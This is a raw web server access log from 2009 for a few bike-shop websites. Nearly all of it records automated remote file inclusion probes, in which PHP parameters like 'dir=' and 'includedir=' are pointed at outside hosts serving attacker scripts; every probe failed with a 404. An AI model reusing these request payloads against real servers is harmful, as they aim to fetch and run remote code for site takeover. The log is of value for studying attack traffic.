211.172.225.50 - - [09/Oct/2009:21:47:14 -0700] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:21:47:14 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:21:47:19 -0700] "GET /skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:21:47:21 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:21:47:21 -0700] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:21:47:36 -0700] "GET /skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:21:47:36 -0700] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:21:47:37 -0700] "GET /logs/access.log//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:21:47:44 -0700] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:21:47:44 -0700] "GET /skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:21:47:44 -0700] "GET /logs/access.log//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:21:47:56 -0700] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:21:47:56 -0700] "GET /skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:21:47:56 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:21:48:03 -0700] "GET /skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:21:48:03 -0700] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:21:48:04 -0700] "GET /logs/access.log//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:21:48:05 -0700] "GET /skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:21:48:05 -0700] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:21:48:05 -0700] "GET /logs/access.log//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:21:48:16 -0700] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:21:48:16 -0700] "GET /skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:21:48:16 -0700] "GET /logs/access.log//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:21:49:46 -0700] "GET /logs/access.log//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:21:49:46 -0700] "GET /skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:21:49:46 -0700] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.176.226.170 - - [09/Oct/2009:22:00:58 -0700] "GET /logs/access.log//korean_pride/write.php?dir=http://www.mismaquinas.com/nueva//banners/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
140.113.223.66 - - [09/Oct/2009:22:25:56 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
140.113.223.66 - - [09/Oct/2009:22:25:56 -0700] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
140.113.223.66 - - [09/Oct/2009:22:25:56 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
140.113.223.66 - - [09/Oct/2009:22:25:56 -0700] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
140.113.223.66 - - [09/Oct/2009:22:25:56 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
140.113.223.66 - - [09/Oct/2009:22:25:56 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
140.113.223.66 - - [09/Oct/2009:22:25:56 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
140.113.223.66 - - [09/Oct/2009:22:26:59 -0700] "GET /translations/German.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.170.119.1 - - [09/Oct/2009:22:32:52 -0700] "GET /translations/Portuguese_BR.txt/tools/send_reminders.php?noSet=0&includedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.170.119.1 - - [09/Oct/2009:22:32:52 -0700] "GET /translations/tools/send_reminders.php?noSet=0&includedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.170.119.1 - - [09/Oct/2009:22:32:52 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.170.119.1 - - [09/Oct/2009:22:36:32 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.170.119.1 - - [09/Oct/2009:22:36:32 -0700] "GET /logs/access.log%20%20/tools/send_reminders.php?noSet=0&includedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.170.119.1 - - [09/Oct/2009:22:40:29 -0700] "GET /translations/Portuguese.txt%20%20/tools/send_reminders.php?noSet=0&includedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.170.119.1 - - [09/Oct/2009:22:40:29 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
202.170.119.1 - - [09/Oct/2009:22:40:29 -0700] "GET /translations/Swedish.txt%20%20/tools/send_reminders.php?noSet=0&includedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
202.170.119.1 - - [09/Oct/2009:22:40:29 -0700] "GET /translations/tools/send_reminders.php?noSet=0&includedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
140.113.223.66 - - [09/Oct/2009:22:43:53 -0700] "GET /translations/Chinese-Big5.txt//tools/send_reminders.php?noSet=0&includedir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
140.113.223.66 - - [09/Oct/2009:22:43:53 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
140.113.223.66 - - [09/Oct/2009:22:43:53 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
140.113.223.66 - - [09/Oct/2009:22:43:53 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
202.170.119.1 - - [09/Oct/2009:22:44:22 -0700] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
140.113.223.66 - - [09/Oct/2009:22:45:51 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
140.113.223.66 - - [09/Oct/2009:22:45:51 -0700] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
140.113.223.66 - - [09/Oct/2009:22:45:51 -0700] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.170.119.1 - - [09/Oct/2009:22:46:29 -0700] "GET /translations/Portuguese.txt/tools/send_reminders.php?noSet=0&includedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
202.170.119.1 - - [09/Oct/2009:22:46:38 -0700] "GET /translations/Swedish.txt/tools/send_reminders.php?noSet=0&includedir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
217.195.185.200 - - [09/Oct/2009:22:49:23 -0700] "GET /login.php?dir=http://www.whinercentral.com/modules/Content/z.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "houstonbikeshop.com"
217.195.185.200 - - [09/Oct/2009:22:49:24 -0700] "GET /logs//login.php?dir=http://www.whinercentral.com/modules/Content/z.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "houstonbikeshop.com"
216.104.44.74 - - [09/Oct/2009:22:51:55 -0700] "GET /logs/access.log//korean_pride/write.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.129.64.174 - - [09/Oct/2009:23:20:38 -0700] "GET /logs/access.log//korean_pride/write.php?dir=http://www.mismaquinas.com/nueva//banners/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
61.129.64.174 - - [09/Oct/2009:23:23:16 -0700] "GET /logs/access.log//korean_pride/write.php?dir=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
74.6.17.164 - - [09/Oct/2009:23:36:32 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:23:36:42 -0700] "GET /translations/Galician.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:23:36:42 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:23:36:42 -0700] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:23:36:42 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:23:40:07 -0700] "GET /translations/Galician.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:23:40:07 -0700] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:23:40:07 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:23:40:07 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:23:40:08 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:23:40:08 -0700] "GET /translations/Galician.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:23:40:08 -0700] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:23:40:08 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:23:40:17 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:23:40:17 -0700] "GET /translations/Galician.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:23:40:17 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:23:40:17 -0700] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:23:40:42 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
74.6.17.164 - - [09/Oct/2009:23:42:04 -0700] "GET /temporarypreviewfile.html HTTP/1.0" 200 1690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:23:43:43 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:23:44:32 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
83.168.226.160 - - [09/Oct/2009:23:44:33 -0700] "GET /translations/Chinese-Big5.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
83.168.226.160 - - [09/Oct/2009:23:44:33 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
83.168.226.160 - - [09/Oct/2009:23:44:33 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
211.40.68.132 - - [09/Oct/2009:23:44:56 -0700] "GET /translations/Chinese-Big5.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
211.40.68.132 - - [09/Oct/2009:23:44:56 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
211.40.68.132 - - [09/Oct/2009:23:44:56 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
211.40.68.132 - - [09/Oct/2009:23:45:19 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
211.40.68.132 - - [09/Oct/2009:23:45:29 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
211.40.68.132 - - [09/Oct/2009:23:45:29 -0700] "GET /translations/Chinese-Big5.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
211.40.68.132 - - [09/Oct/2009:23:45:30 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
211.40.68.132 - - [09/Oct/2009:23:45:30 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
83.168.226.160 - - [09/Oct/2009:23:45:37 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:23:45:37 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:23:45:37 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:23:46:45 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:23:46:49 -0700] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:23:46:49 -0700] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:23:46:49 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.172.225.50 - - [09/Oct/2009:23:46:49 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.172.225.50 - - [09/Oct/2009:23:46:49 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.40.68.132 - - [09/Oct/2009:23:46:52 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:23:48:25 -0700] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:23:48:25 -0700] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
83.168.226.160 - - [09/Oct/2009:23:48:26 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
83.168.226.160 - - [09/Oct/2009:23:48:26 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
83.168.226.160 - - [09/Oct/2009:23:48:27 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
65.55.115.174 - - [09/Oct/2009:23:48:50 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
211.172.225.50 - - [09/Oct/2009:23:49:05 -0700] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:23:49:05 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.172.225.50 - - [09/Oct/2009:23:49:05 -0700] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.172.225.50 - - [09/Oct/2009:23:49:05 -0700] "GET /translations/Swedish.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.172.225.50 - - [09/Oct/2009:23:49:05 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.40.68.132 - - [09/Oct/2009:23:50:18 -0700] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:23:50:18 -0700] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.40.68.132 - - [09/Oct/2009:23:50:19 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.40.68.132 - - [09/Oct/2009:23:50:19 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
